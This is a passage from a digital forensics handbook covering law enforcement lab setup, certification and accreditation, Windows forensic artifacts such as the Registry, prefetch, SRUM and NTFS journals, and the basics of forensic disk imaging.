digital forensics in the few short years that I have been working in the industry. Some work for companies that make competing software. I have found that collaboration even among competitors is like nothing seen in any other market. That said, I will not be granting any single product my sole endorsement, but rather will describe the pros and cons of each, as I see them. The largest players in commercial off-the-shelf digital forensics solutions are Magnet Forensics, Cellebrite, Oxygen Forensics, Belkasoft, Exterro, Basis Technology, MSAB, and EnCase. These are
  • 157. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 150 not in any particular order, and I have not intentionally excluded any not listed. These are just the products that I have had personal experience with and see most often discussed between examiners. In my day-to-day operations, I use both Magnet AXIOM and Cellebrite, depending on which report my detectives prefer. A smaller agency may not have the budget for both or either. Autopsy is an excellent free program from Basis Technology and was created by Brian Carrier. I have used it to validate evidence extracted with commercial tools to great success. I would recommend it to be a must-have for every lab for that very reason. When considering open-source and free software, always use a test environment before implement- ing it in a production network. There are many exciting and brilliant tools made freely available to the community by their authors and some of which allow you to contribute code towards their improvement. Thanks to Brian Carrier, we have Autopsy, as Eric Zimmerman gave us KAPE and EZ Tools, and Alexis Brignoni, the Log Events and Properties Parser (xLEAPP) series. There are so many wonderful free tools out there that you could fill an entire book and you will discover them and want to try them out as much as possible, as there is no single tool that does everything perfectly. As an examiner, you will need to be a lifelong learner and stay connected to the community to remain on top of new discoveries, tools, and techniques. Selecting peripheral equipment You will find very quickly that workstations and software are only the beginning of your expen- ditures. Many peripheral devices and tools will also need to be purchased to assist with various examinations. You can plan to purchase them upfront or as needed. In some cases, you may only use the device once in several years. While this list is in no way extensive or exclusive, it is exemplary of the tools that I purchased for my lab as I discovered the need for them. • A digital camera for photographing devices and crime scenes. It is helpful to purchase one capable of video recording in high definition and connecting to your workstation for file transfer • An external SSD drive for transferring files between workstations. The larger and faster, the better • Computer hand tools that can be purchased specifically for computer or mobile device repair • A heat gun for melting the glue around a mobile device touchscreen • A magnifying visor with a light for seeing small screws and writing • Various cables for connecting to various types of hard drives and SSDs. (I.E. IDE, ATA, SATA, USB) • Data transfer cables for various types of phones (i.e. Lightning, Micro USB, USB-C, Mini USB) • An anti-static mat • Write blocker for preventing data writes on target hard drives • A charging cabinet for devices that are bruteforcing • Faraday bags and a faraday cage for preventing devices from touching mobile networks • External battery chargers for transferring low-power devices from the crime scene to the lab • SIM card and SD card readers
  • 158. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 151 • APC Battery backup and surge protector for your expensive workstations There are many other items for which you may or may not discover the need as your caseload grows, but these items are the most likely. You may also consider purchasing cloud services for the storage of digital evidence or have your IT department set up dedicated server space that can be expanded. Smaller agencies may just use hard drives stored in the evidence locker. Planning for Disaster You will want to have a disaster recovery plan for lightning strikes, flooding, fire, earthquake, or simply hardware failure and viruses. You will invest tens of thousands of dollars and countless hours planning, purchasing, and setting up your lab. A good disaster recovery plan protects that investment. You may include a backup plan for your workstation once per week. The rule is to store at least one copy of backups on site and duplicate copies at an off-site location. You may want to log all updates to your workstation in case you encounter an issue and need to roll-back or troubleshoot new problems. Keep your forensic workstation on a dedicated network of its own if it needs to have an internet connection at all. Invest in a good antivirus and monitoring tool. In the recovery plan, you will also need to consider upgrading components every two to three years as wear will degrade your equipment over time. Certification and Training Some US States require digital forensics examiners to be certified. Whether or not that is the case for your location, it is good to consider having at least one examiner certified and trained to teach others. There are non-profit organizations such as the National White Collar Crime Center (NW3C) that offers both training and certification for Cyber Crime Examiners and Investigators free of cost to law enforcement or government personnel. The training is on par with for-profit organizations and the certification is much less costly. There is no exam as it is experience based, and it lasts for one year. As stated, there are also for-profit organizations that offer certification and individual vendors that certify users of their specific tools. Why should you get certified? In any case, it is worth the investment of time and money and greatly helpful when called to the stand in court. Your testimony will carry more weight if you are certified and the knowledge gained from the training involved will help you to make competent and confident statements when cross- examined.
  • 159. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 152 Where to find training I always suggest to everyone to begin their quest for information at AboutDFIR.com¹⁸². You will find ample resources and an updated list of training with prices. Some other sites to consider are DFIRDiva.com¹⁸³ and DFIR.Training¹⁸⁴. SANS Institute¹⁸⁵ has very reputable programs for training and certification that is recognized worldwide, though costly and not recommended (by me) for inexperienced examiners. Their certification exams are open book and timed and you are given practice tests prior to taking the final. Should you achieve this level of certification, you will definitely be considered a member of an elite class of Digital Forensics Examiners. Creating a training plan for your lab Whether you are the only examiner or you have multiple people working in your lab, you need to have a training plan for everyone, especially if they are trying to maintain certifications that require annual credit hours for reinstatement. Accreditation Accreditation is not mandatory in the United States, but it is highly recommended. However, it may become mandatory in the future and therefore is worth mentioning and describing. The ANSI-ASQ National Accreditation Board (ANAB)¹⁸⁶ is a subsidiary of the American National Standards Institute (ANSI)¹⁸⁷ and the American Society for Quality (ASQ)¹⁸⁸. In order to have your lab considered for accreditation, ANAB will audit the lab’s tasks and functions to ensure correct procedures are being followed consistently. Budgeting for the lab Digital Forensics is an expensive operation. You will need to budget appropriately for your lab to continue successfully and responsibly. Plan for hardware and software licensing costs alongside training, certification, and expansion costs. Create a monthly, quarterly, and annual expenditure spreadsheet. Estimate your total annual number of examinations and type of cases as you may need to plan for the purchase of new software or hardware for use in special circumstances. Planning for future operations is critical as technology evolves quickly and storage size on devices grows rapidly. Training is absolutely necessary to maintain knowledge of new operating systems and hardware. ¹⁸²https://aboutdfir.com/ ¹⁸³https://dfirdiva.com/ ¹⁸⁴http://dfir.training/ ¹⁸⁵https://www.sans.org/ ¹⁸⁶https://anab.ansi.org/ ¹⁸⁷https://ansi.org/ ¹⁸⁸https://asq.org/
  • 160. Chapter 7 - The Law Enforcement Digital Forensics Laboratory 153 Duties and responsibilities ANAB requires that specific objectives be determined for each role within a digital forensics lab by the lab manager who is responsible for establishing, enforcing, and reviewing, procedures for case management. The manager also plans for updates and upgrades and accounts for all activities and training within the lab. Other lab members should have enough training to utilize their equipment effectively and should report directly to the lab manager. Privacy Policy Any law enforcement digital forensics lab should consider having a privacy policy regarding the handling of digital evidence. There are websites such as NATSAR.com¹⁸⁹ that offer model policies for a price, but you can also reach out to the community through the Digital Forensics Discord Server for free copies of other agency policies. Having a privacy policy will go far to protect your agency and lab members from litigation in high-profile cases. Standard Operating Procedures It should go without saying that having Standard Operating Procedures (SOP) developed, main- tained, and reviewed by the lab manager is a good consideration. Not only is it required for accreditation, but it will also protect the agency from litigation in much the same way as having a privacy policy. By creating SOPs that are based on national standards from the Scientific Working Group on Digital Evidence (SWGDE)¹⁹⁰ or the National Institute of Standards and Technology (NIST)¹⁹¹, you can rest assured that your lab is operating within accreditation standards. Chapter Summary In summary, a law enforcement digital forensics lab operates to conduct criminal investigations and store evidence. The outcome of a murder investigation and the exoneration of an innocent suspect may be entirely determined by the work done by lab members. That responsibility should weigh heavily upon each person involved and be considered in day-to-day operations as well as future planning. The setup and maintenance of an effective lab can be an expensive operation, and the obligation to tax-paying citizens should be a constant presence in the mind of the lab manager. As Law Enforcement Examiners, your duty is to protect and serve the community and your agency. Always remember that, and strive to make your lab better every day, by improving your skills and knowledge, that of other lab members, and your equipment. Serve with pride in knowing that your mission is noble and impactful, and you will be joined by a global community of Digital Forensics Examiners that will welcome you into the fold. ¹⁸⁹https://natsar.com/ ¹⁹⁰https://www.swgde.org/ ¹⁹¹https://www.nist.gov/
  • 161. Chapter 8 - Artifacts as Evidence By Nisarg Suthar¹⁹² Forensic Science Before learning about artifacts as digital evidence, I’ll preface this chapter with the most fundamental definition of basic science. So what is Science? It is a field that follows a scientific process in any domain. That process is cyclical and goes something like this: • We make observations in nature. • We form an initial hypothesis about something. • We look for things that confirm or deny the formed hypothesis. • If we find something that denies it, we form a new hypothesis and go back to making observations. • If we find something that confirms it, we continue making new observations to extend our dataset and verify the hypothesis until the dataset is substantial in confirming it precisely and accurately. If we further find something that denies the original hypothesis, we form a new one by repeating the process. ¹⁹²https://linktr.ee/NisargSuthar
  • 162. Chapter 8 - Artifacts as Evidence 155 We never pollute this scientific process with biases or opinions. It is only credible as far as the fact finder’s neutrality goes. All scientists trust observations and verified prior research, discarding all speculation. 16.1 - Attr: GliderMaven, CC BY-SA 4.0, via Wikimedia Commons Ultimately, the goal of any science is not to state things in absolutes but in observations, experiments, procedures, and conclusions. Even the fundamental laws of science begin with a basic foundation laid of assumptions. Much like any scientific field, ‘forensics’ or ‘criminalistics’ is a branch of science that deals with identifying, collecting, and preserving evidence of a crime. It is not just identifying, collecting, and preserving but doing so in a forensically sound manner. What that means is that evidence should not be changed or stray away from its true form. Digital Forensics is a six-phase process including: • Preparation: Making sure your suite of forensic tools is up to date, and destination media are sanitized. • Identification: Identifying the devices of interest at the site. Mobile phones, laptops, IoT devices, USB drives, cameras, SD cards, etc. Anything with some type of digital memory. • Collection: Acquiring the memory via imaging and hashing the sources for verification. • Preservation: Using techniques viable for long-term storage of sensitive evidence. Also includes maintaining a valid chain of custody. • Analysis: Dissecting the acquired evidence. All puzzle solving and brainstorming happens in this phase. • Reporting: Preparing a concise and easily digestible report of your findings for people who may not be technically inclined. The report must show forensic soundness for it to be admissible in a court of law.
  • 163. Chapter 8 - Artifacts as Evidence 156 Types of Artifacts Analysis is a major phase where forensicators discover different types of artifacts ranging from plain metadata to complex evidence of execution and residual traces. The vast gap between the difficulty of retrieving or reconstructing evidence determines the fine line between E-Discovery and Digital Forensics. User data such as internet history, images, videos, emails, messages, etc., fall under E-Discovery. It is relatively easy to reconstruct even from the unallocated space. However, System Data-like artifacts that help support some view of truth, or determine how closely a transpired event is to the evidence, are not that simple to manually parse with forensic soundness, which is why often times forensicators rely on well-known parsing tools, either commercial or open- source. 16.2 - Attr: Original from 6th slide in DVD included with E-Discovery: An Introduction to Digital Evidence by Amelia Phillips, Ronald Godfrey, Christopher Steuart & Christine Brown, modified here as text removal And that is the main difference between E-Discovery & Digital Forensics, depending on the categorization of data alone. Both follow different procedures and have different scopes of execution. Generally, E-Discovery can be contained to only the logical partitions and the unallocated region, whereas Digital Forensics operates in a much wider scope solely due to the necessity of dealing with complex data structures.
  • 164. Chapter 8 - Artifacts as Evidence 157 What is Parsing? This brings us to parsing. We often go around throwing the term while working with a variety of artifacts; “Parse this, parse that”, but what does it mean in the real sense? To understand the parsing methodology, tools & techniques, we must be familiar with the origin of the handling of the data being parsed. What I mean by that is how the data was originally meant to be handled. What was its structure by design? How can it be replicated? Generally, it is some feature or underlying mechanism of the main operating system installed on the device. Parsing tools are written to accurately mimic those functions of the operating system, which make the raw data stored on the hardware human readable. 16.3 - Attr: Kapooht, CC BY-SA 3.0, via Wikimedia Commons Understand the operating system as an abstraction level between the end-user and the intricacies of raw data. It provides an interface to the user which hides all the complexities of computer data and how it is being presented. Before parsing the artifacts and diving deep into analysis, you must fully understand how files are generally handled by an operating system. As mentioned earlier, an operating system is just a very sophisticated piece of software written by the manufacturers to provide an abstraction level between the complexities of hardware interactions and the user. In the context of file handling, operating systems either store files or execute files. Both of which require different types of memory. Also, note that storing files requires access to storage media such as HDDs, SSDs, and flash drives, whereas executing files requires access to the microprocessor. Both are handled by the operating system.
  • 165. Chapter 8 - Artifacts as Evidence 158 As you might already know, computers, or any electronic computing device for that matter, primarily utilize two types of memory: 1. RAM (Random Access Memory): • Volatile memory, only works for the time power is supplied. • Used for assisting the execution of applications/software by the processor of the device. 2. ROM (Read Only Memory): • Non-volatile memory, retains data even when not in use. • Used for storing the application files for a larger period of time. There are many sub-types of both RAM & ROM, but only the fundamental difference between them is concerned here. Now let’s look at the lifecycle of an application in two stages: 1. Production Cycle: An application is a set of programs. A program is a set of code written by a programmer, generally, in higher-level languages, that does not interact directly with machine-level entities such as registers, buses, channels, etc. That piece of code is written to the disk. The code is then compiled to assembly, which is a lower leveled language that can interact directly with machine-level entities. Finally, the assembly is converted to the machine code consisting of 1s and 0s (also known as binary or executable file), which is now ready for its execution cycle. 2. Execution Cycle: Now that the program is sitting on the disk, waiting to be executed, it is first loaded into the RAM. The operating system instructs the processor about the arrival of this program and allocates the resources when they’re made available by the processor. The processor’s job is to execute the program one instruction at a time. Now the program can execute successfully if the processor is not required to be assigned another task with a higher priority. If so, the program is sent to the ready queue. The program can also terminate if it fails for some reason. However, finally, it is discarded from the RAM.
  • 166. Chapter 8 - Artifacts as Evidence 159 You can easily remember both of these cycles by drawing an analogy between electronic memory and human memory. Here, I use chess as an example. Our brains, much like a computer, uses two types of memory: 1. Short-term (Working memory): • For a game of chess, we calculate the moves deeply in a vertical manner for a specific line based on the current position. • This is calculative in nature. The calculation comes from the present situation. 2. Long-term (Recalling memory): • At the opening stage in a game of chess, we consider the candidate moves widely in a horizontal manner for many lines. • This is instinctive in nature. Instinct comes from past experiences. Understanding how an operating system parses the data from different sources, whether it is on disk or in memory, will help you identify, locate, and efficiently retrieve different types of artifacts necessary for an investigation.
  • 167. Chapter 8 - Artifacts as Evidence 160 Artifact-Evidence Relation You will come across an ocean of different artifacts in your investigations, but artifacts have a very strange relationship with what might potentially be considered evidence. Artifacts alone do not give you the absolute truth of an event. They provide you with tiny peepholes through which you can reconstruct and observe a part of the truth. In fact, one can never be sure if what they have is indeed the truth in its entirety. 16.4 - Attr: Original by losmilzo on imgur, modified here as text removal
  • 168. Chapter 8 - Artifacts as Evidence 161 I always love to draw an analogy between the artifacts and the pieces of a puzzle, of which you’re not certain to have the edge or the corner pieces. You gather what you can collect and try to paint the picture as unbiased and complete as possible. 16.5 - Attr: By Stefan Schweihofer on Pixabay That being said, if you apply the additional knowledge from metadata, OSINT, and HUMINT to the parsed artifacts, you might have something to work with. For instance, say you were assigned an employee policy violation case where an employee was using their work device for illegally torrenting movies. Parsing the artifacts alone will give you information about the crime, but not as evidence. You would still need to prove that the face behind the keyboard at the time of the crime was indeed the one that your artifacts claim. So you would then look for CCTV footage around the premises, going back to the Identification phase in the Digital Forensics lifecycle, and so forth and so on. As a result of the codependency of the artifacts on drawing correlations to some external factor, they form a direct non-equivalence relation with evidence. However, note that this “rule”, if you will, is only applicable to a more broad scope of the investigation. In the more narrow scope as a forensicator and for the scope of your final forensic report, artifacts are most critical. Just keep it in the back of your mind that encountering an artifact alone doesn’t mean it’s admissible evidence. Parse the artifact, make notes, and document everything. Being forensically sound is more important than worrying about completing the entire puzzle because there will be no edge or corner pieces to it.
  • 169. Chapter 8 - Artifacts as Evidence 162 Examples This section will cover how some of the more uncommon artifacts can play into a case from a bird’s eye view. We won’t be getting into the technical specifics on the parsing or extraction, but rather the significance of those artifacts at a much higher level, including what it offers, proves, and denies. Additionally, what is its forensic value? I suggest the readers use these brief bits to spark their curiosity about these important artifacts and research on their own about locating and parsing them. Registry About: • The Windows Registry is a hierarchical database used by the Windows operating system to store its settings and configurations. Additionally, it also stores some user data pertaining to user applications, activities, and other residual traces. • The Registry is structured with what are called Hives or Hive Keys (HK) at the top-most level. Each hive contains numerous keys. A key can contain multiple sub-keys. And sub-keys contain fields with their values. There are mainly two types of hive files: 1. System Hive Files: • SAM (Security Account Manager): User account information such as hashed passwords, and account metadata including last login timestamp, login counts, account creation timestamp, group information, etc. • SYSTEM: File execution times (Evidence of Execution), USB devices connected (Evidence of Removable Media), local timezone, last shutdown time, etc. • SOFTWARE: Information about both user and system software. Operating System infor- mation such as version, build, name & install timestamp. Last logged-on user, network connections, IP addresses, IO devices, etc • SECURITY: Information about security measures and policies in place for the system. 2. User Specific Hive Files: • Amcache.hve: Information about application executables (Evidence of Execution), full path, size, last write timestamp, last modification timestamp, and SHA-1 hashes. • ntuser.dat: Information about autostart applications, searched terms used in Windows Explorer or Internet Explorer, recently accessed files, run queries, last execution times of applications, etc. • UsrClass.dat: Information about user-specific shellbags is covered in the next section.
  • 170. Chapter 8 - Artifacts as Evidence 163 Significance: • Identifying malware persistence which can lead to the discovery of Indicators of Compromise (IOCs). • Proving the presence of removable media in a particular time frame, which can further help with the acquisition of the same. • Retrieving crackable user password hashes from the SAM and SYSTEM hives, which might help access the encrypted partitions if the password was reused. Shellbags About: • Shellbags were introduced in Windows 7. It is a convenience feature that allows the operating system to remember Windows Explorer configuration for user folders and a folder’s tree structure. • Whenever a folder is created, selected, right-clicked, deleted, copied, renamed, or opened, shellbag information will be generated. • Depending on the Windows version, shellbag information can be stored in either ntuser.dat, UsrClass.dat, or both. Significance: • Reconstructing the tree structure for deleted folders. Helpful in providing an idea of the files that used to exist when they cannot be carved from the unallocated space. • Disproving denial of content awareness. If a subject claims that they were simply not aware of something existent on their system, shellbags can disprove their claims with an obvious given that an exclusive usage of the machine was proven. • Getting partial information about the contents of removable media that were once mounted on the system. Prefetch About: • Prefetch was first introduced in Windows XP. It is a memory management feature that optimizes loading speeds for files that are frequently executed. Originally it was meant for faster booting times, but since has been developed for applications too. Hence, this artifact is direct evidence of execution. • We looked at the lifecycle of an application earlier, the prefetcher in Windows works in the same way. It studies the first ∼10 seconds of an application launched and creates/updates the corresponding prefetch file, for faster loading speeds on the next execution.
  • 171. Chapter 8 - Artifacts as Evidence 164 • Starting from Windows 10, prefetch files are compressed by default to save considerable disk space. It uses the Xpress algorithm with Huffman encoding. For validation purposes, forensicators must decrypt their prefetch files first. Thank you Eric¹⁹³ for this handy Python script¹⁹⁴ for the same. 16.6 - Working of Windows Prefetcher It has three working modes: Value Description 0 Disabled 1 Application prefetching enabled 2 Boot prefetching enabled 3 Application & Boot prefetching enabled This value is set from the registry key: HKLMSYSTEMCurrentControlSetControlSession ManagerMemory ManagementPrefetchParameters Forensicators can refer to this key to check if prefetching is disabled. ¹⁹³https://twitter.com/ericrzimmerman ¹⁹⁴https://gist.github.com/EricZimmerman/95be73f6cd04882e57e6
  • 172. Chapter 8 - Artifacts as Evidence 165 Significance: • Since it is evidence of execution, it helps identify anti-forensic attempts at bypassing detection. Any automated anti-forensic tools ran would in turn result in its own prefetch file being generated. • Useful in identifying and hunting ransomware executed. Once identified, analysts can look for publicly available decryptors to retrieve encrypted files. • By studying files and directories referenced by an executable, analysts can identify malware families. • Application execution from removable media or deleted partitions can be identified from the volume information parsed. • Timestamps for the last eight executions and the run counter are useful for frequency analysis of malicious executables. Worms which would result in multiple prefetch files referencing the exact same resources is a prime example of this. Jumplists & LNK files About: • LNK files or link files are the shortcuts that a user or an application creates for quick access to a file. LNK files themselves are rich in file metadata such as timestamps, file path, file hash, MAC address, volume information, and volume serial numbers. • However, apart from the Recent Items and Start Menu folders, these LNK files are also found embedded in jumplists. • Jumplists were first introduced in Windows 7. It is a convenience feature of the Windows Taskbar, that allows a user to have quick access to recently used files in or by different applications. It automatically creates these ‘lists’ in the right-click context menu which can be used to ‘jump’ to induce a frequently used action. • There are two types of jumplists; automatic and custom. Automatic jumplists are those created automatically by Windows, based on the MRU and MFU items. Custom jumplists are those explicitly created by the user, like bookmarks in a browser or pinning files for instance. • Both categories of these jumplists provide rich information like modified, accessed, and created timestamps, and absolute file path of the original file. Significance: • Useful to gain information on uninstalled applications and deleted files from the system & also applications ran and files opened from removable media. • Again, being direct evidence of execution, it can be useful in timelining executed applications and opened files. • Useful to discover partial user history including URLs and bookmarks.
  • 173. Chapter 8 - Artifacts as Evidence 166 SRUDB.dat About: • SRUDB.dat is an artifact resulting from a new feature introduced in Windows 8, called SRUM (System Resource Usage Monitor) which tracks and monitors different usage statistics of OS resources such as network data sent & received, process ownership, power management information, push notifications data and even applications which were in focus at times along with keyboard and mouse events as per a new research¹⁹⁵. • It is capable of holding 30-60 days worth of tracking data at a time. • So far, we haven’t looked at an artifact that has been able to undoubtedly map a particular process executed to a user. SRUDB.dat offers us this critical information directly. It is one of the most valuable artifacts due to the multidimensional applications of SRUM by the OS itself. Significance: • Useful in mapping process to a user account. Especially useful in the scenarios of restricted scope of acquisition. • Useful in mapping a process to network activity such as bytes sent & received. Helpful in identifying data exfiltration incidents. • Useful in timelining and distinguishing network interfaces connected to, and hence potentially estimate the whereabouts of the machine if those networks were distanced farther away from one another. • Useful in analyzing power management information such as battery charge & discharge level. • Useful in stating awareness or lack thereof, of an application that would’ve been visible on screen at one point in time, and the interaction with it by the means of input devices. hiberfil.sys About: • hiberfil.sys was first introduced in Windows 2000. It is a file used by Windows for memory paging, at the time of hibernations or sleep cycles. It is also used in case of power failures. • Paging is a mechanism to store the current contents of the memory on disk, for later retrieving them and continuing from the same stage. This prevents additional processing by applications and optimizes resource allocation by the operating system. Windows also enhanced this to allow faster startup times from sleep states. • It uses the Xpress algorithm for compression. Volatility’s imagecopy plugin can be used to convert this artifact to a raw memory image. ¹⁹⁵https://aboutdfir.com/app-timeline-provider-srum-database/
  • 174. Chapter 8 - Artifacts as Evidence 167 Significance: • This is one of those artifacts which hops around its categorical type, and so this extra memory content can provide more information to your investigation. • To tackle accepting unfortunate shutdowns of locked devices in an investigation, one can retrieve this file at the time of disk forensics and get additional information by performing memory forensics on the converted file. This way we can retain partial volatile memory data. • May contain NTFS records, browsing history, index records, registry data, and other useful information. pagefile.sys About: • Similar to hiberfil.sys, pagefile.sys is a swapping file used by Windows to temporarily store new contents that were supposed to be loaded in the memory but could not due to insufficient space. When the required amount of memory is freed, contents are transferred from this artifact back to the memory. • The only known methods to get some information from this artifact are using the string utility, a hex editor, and filtering using regex. • It can store chunks of data capping at 4kb in size. Significance: • Useful in hunting IOCs in malware cases. • Useful in carving smaller files that were meant to be loaded into the memory. Meaning it is evidence of access. If an image was successfully carved from this artifact, it means that it was opened, as it would have meant to be eventually loaded in the working memory of that device. • May contain NTFS records, browsing history, index records, registry data, and other useful information. $MFT About: The next few artifacts, including this one, are a part of the NTFS file system - one of the most common file systems encountered when working with Windows OS. • MFT stands for Master File Table. It is a record of every file that exists or once existed on that particular file system. • It also contains other information like path to that file, file size, file extension, MACB timestamps, system flags, whether it was copied or not, etc.
  • 175. Chapter 8 - Artifacts as Evidence 168 • Sometimes if the file size is small enough to be accommodated by the MFT entry, we can even retrieve the resident data from the record entry itself. Typically MFT entry is 1024 bytes long, and small files can very well be completely fitting in this range. It is known as MFT slack space. Significance: • Files that were deleted, may still have an intact MFT record entry if not overwritten. • Useful in retrieving smaller files from the record itself and the file history on disk. • Important metadata like MACB timestamps can be obtained. $I30 About: • $I30 is called the index attribute of the NTFS file system. A $I30 file corresponding to each directory is maintained by the NTFS file system as the B-tree would be constantly balancing itself as different files are created or deleted. • $I30 is not a standalone file or artifact but a collection of multiple attributes of the file system. Attribute files like the $Bitmap, $INDEX_ROOT, and $INDEX_ALLOCATION. The 30 in its name comes from the offset for $FILE_NAME in an MFT record. • It keeps track of which files are in which directories, along with MACB timestamps and file location. • It also has slack space, similar to $MFT, but again for smaller files. Significance: • Original timestamps for deleted files can be retrieved. • Useful in the detection of anti-forensic tools and timestamping as the timestamps are $FILE_- NAME attribute timestamps which are not easily modifiable or accessible through the Windows API. • Important metadata like MACB timestamps can be obtained. $UsnJrnl About: • The NTFS file system has a journaling mechanism, which logs all the transactions performed in the file system as a contingency plan for system failures and crashes. This transaction data is contained in the $UsnJrnl attribute file.
  • 176. Chapter 8 - Artifacts as Evidence 169 • $UsnJrnl, read as USN Journal, is the main artifact which contains two alternate data streams namely $Max and $J, out of which $J is highly of interest for forensicators. It contains critical data such as if a file was overwritten, truncated, extended, created, closed, or deleted along with the corresponding timestamp for that file update action. • $UsnJrnl tracks high-level changes to the file system, like file creation, deletion, renaming data, etc. Significance: • Useful to support or deny timestamp metadata. Potential evidence of deleted and renamed files. i.e., evidence of existence. • The slack space for this artifact isn’t managed at all, so additional data could be carved. Since it only keeps the data for some days, carving can be potentially useful for deleted records. • Tracks changes to files and directories with the reason for the change. $LogFile About: • This is yet another artifact used by the NTFS for journaling. The only difference is that$LogFile is concerned with changes made to the MFT and not the entire NTFS file system itself. Meaning it may directly contain data that was changed, similarly to how $MFT sometimes stores the files if they’re small enough. • These 4 artifacts, in a bunch can say a lot about an event or a transaction while performing file system forensics. • $LogFile tracks low-level changes to the file system, like data that was changed. Significance: • Detect anti-forensic attempts targeted on the $MFT since $LogFile contains changes made to it. • Tracks changes made to $MFT metadata such as MACB timestamps. • Could help reconstruct a chronological list of transactions done to the files on the file system.
  • 177. Chapter 8 - Artifacts as Evidence 170 References 16.1 - Scientific law versus Scientific theories, by GliderMaven, under CC BY-SA 4.0¹⁹⁶, via Wikimedia Commons¹⁹⁷ 16.2 - The relationship between e-discovery and digital forensics, from 6th slide in DVD included with E-Discovery: An Introduction to Digital Evidence¹⁹⁸, via YouTube¹⁹⁹ 16.3 - Role of an Operating System, by Kapooht, CC BY-SA 3.0²⁰⁰, via Wikimedia Commons²⁰¹ 16.4 - Our perception of truth depends on our viewpoint 2.0, by losmilzo²⁰², via Imgur²⁰³ 16.5 - Puzzle Multicoloured Coloured, by Stefan Schweihofer²⁰⁴, under Simplified Pixabay License²⁰⁵, via Pixabay²⁰⁶ ¹⁹⁶https://creativecommons.org/licenses/by-sa/4.0 ¹⁹⁷https://commons.wikimedia.org/wiki/File:Scientific_law_versus_Scientific_theories.png ¹⁹⁸https://www.amazon.com/Discovery-Introduction-Digital-Evidence-DVD/dp/1111310645 ¹⁹⁹https://www.youtube.com/watch?v=btfCf9Hylns ²⁰⁰https://creativecommons.org/licenses/by-sa/3.0 ²⁰¹https://commons.wikimedia.org/w/index.php?curid=25825053 ²⁰²https://imgur.com/user/losmilzo ²⁰³https://imgur.com/gallery/obWzGjY ²⁰⁴https://pixabay.com/users/stux-12364/ ²⁰⁵https://pixabay.com/service/license/ ²⁰⁶https://pixabay.com/vectors/puzzle-multicoloured-coloured-3155663/
  • 178. Chapter 9 - Forensic imaging in a nutshell By Guus Beckers²⁰⁷ | LinkedIn²⁰⁸ What is a disk image? A disk image is a representation of data contained within a disk. It contains the contents of the entire disk, including all files and folders. Dedicated forensic hardware appliances or software packages ensure a bit-by-bit copy is performed. In other words, the contents of the disk image will match the contents of the disk exactly. When an unexpected error has occurred, this will be flagged and the forensicator will be notified. It is possible to make a disk image from every data source, including desktop computers, laptops and servers, a USB-drive, an SD-card, or any other storage medium you can think of. While a complete discussion about file systems is outside the scope of this chapter, it is impossible to touch upon forensic imaging and not talk about file systems. A file system entails the logical representation of files and folders on the disk. It allows an operating system to keep track of files as well as other important file properties such as its location, size, file format, and any associated permissions. There are different files systems used across operating systems. The NTFS file system is currently used by all supported versions of Microsoft Windows. APFS is used by devices created by Apple, it is used across a wide range of devices including phones, tablets, TV appliances, and computers. Lastly, there is the Linux operating system, which uses a variety of file systems, depending on the version which is installed. Common varieties include ext3/ext4 and btrfs. More specialized file systems for specific appliances are also in use. The exact intricacies and technical documentation of a file system are often not available outside of its vendor which means that software vendors have to reverse engineer a file system to a degree. Expect a forensic investigation suite to continually improve support for popular file systems. ²⁰⁷http://discordapp.com/users/323054846431199232 ²⁰⁸https://www.linkedin.com/in/guusbeckers/
  • 179. Chapter 9 - Forensic imaging in a nutshell 172 Once a disk image has been created it is possible to calculate its checksum. A checksum can be used to verify the integrity of a disk image. This is of paramount importance during a forensic investigation. Evidence will always need to be retrieved from other systems. Calculating a checksum at both ends, the source and destination file(s), will ensure that no anomalies are present. When a checksum matches at both ends, this means that no anomalies are present, the contents of the file match exactly and can be used in a forensic investigation. In order to create a checksum, a hash is created. A hash is a mathematical, one-way calculation, performed by a specific algorithm. The MD5 and SHA1 algorithms are commonly used in the forensic community although other algorithms can be used as well. After validation of the checksum, the created image will be ready to use in an investigation. Forensic investigation suites will use the disk image as a basis for the investigation, allowing a forensicator to browse the file system for pertinent files and other forensic artifacts. Post-processing will also occur in many forensic suites, automatically parsing popular artifacts, thereby making investigations easier.
  • 180. Chapter 9 - Forensic imaging in a nutshell 173 Creating a disk image There are different ways to create a disk image, this section will discuss the most popular methods. Be aware that different scenarios might require different imaging methods. The following subsections are not intended to be ranked in order of preference. Using a forensic duplicator Forensic duplicators come in many shapes and sizes, however it’s most common variety is a portable hardware appliance that can be easily transported and can be used both in a lab environment or on- site at a client. A forensic duplicator can be used to create disk images of various physical media types. In order to do this, it distinguishes between source and destination drives. Source drives are generally connected to the left side of the device while destination drives are connected to the right side of the device. Be sure to confirm this with individual duplicators as there might be deviations. Forensic duplicators support a range of different connectivity methods such as SATA, IDE, and USB. The ports supported by a duplicator are mirrored on either side of the device. Ensure that the correct drives are connected to the correct side of the device prior to imaging. Failure to do this might result in data erasure. Specialized duplicators also support SAS or an Ethernet connection to image from a computer network. Duplicators are used to perform the following functions: • Clone a disk to a different disk • Clone a disk to an image • Format or wipe a disk • Calculate hashes and verify its integrity • Detection of a HPA or DCO • Blank disk detection, verifying whether a disk is entirely blank or contains data
